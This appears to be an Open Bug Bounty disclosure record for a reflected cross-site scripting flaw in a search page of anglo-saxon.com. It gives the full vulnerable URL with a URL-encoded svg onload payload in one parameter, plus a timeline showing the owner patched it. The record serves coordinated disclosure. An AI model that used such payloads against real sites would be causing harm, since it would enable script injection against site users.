anglo-saxon.com XSS vulnerability

2017-09-25T17:51:00
ID OBB:311982
Type openbugbounty
Reporter Rashed_Naamani
Modified 2017-12-25T11:39:00

Description

Vulnerable URL:
http://www.anglo-saxon.com/en/search.php?branch_id=-1&district_id=-1&cat_id=6&project=-1&commercial=-1&plot=-1&InvestmentProp=N&toMilion=N&isAdv=-1&currency=nis&sub_district_id=-1&CityID=-1&lang=en&CityPartID=&HouseTypeID=-1&rooms_min=&rooms_max=&cat_id2=6&price_min=&price_max=&floor_min=&floor_max=&f=%27%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E&area_min=&area_max=&ShowApt_text=Second+Hand%2C+New+Projects&ShowApt%5B%5D=1&ShowApt%5B%5D=2
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1366907
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 25 September, 2017 17:51 GMT
Generic security notifications sent to website owner| 25 September, 2017 17:54 GMT
Notification sent to subscribers (without technical details)| 25 September, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 24 December, 2017 18:18 GMT
Vulnerability patched by the website owner| 25 December, 2017 11:39 GMT